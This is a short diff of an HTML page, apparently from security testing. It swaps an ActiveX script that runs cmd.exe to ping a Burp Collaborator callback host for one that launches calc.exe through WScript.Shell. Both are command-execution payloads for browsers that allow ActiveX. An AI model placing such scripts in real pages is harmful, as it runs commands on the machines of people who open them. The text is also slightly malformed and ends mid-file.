--- a/1.html
+++ b/1.html
@@ -1,8 +1,11 @@
   GNU nano 4.8                                                                                          p.html                                                                                                     
 <!DOCTYPE html>
 <html>
-  <script>var objShell = new ActiveXObject("Shell.Application");
-        objShell.ShellExecute("cmd.exe", "C: ping 1tv7uu4ypbhl6duwr8mt3qegb7h05p.burpcollaborator.net", "C:\WINDOWS\system32", "open", "1");
+  <script>function launchCalc()
+{
+ WshShell = ActiveXObject("WScript.Shell")
+ WshShell.Run("calc.exe")
+}
 </script>
 <body>
 
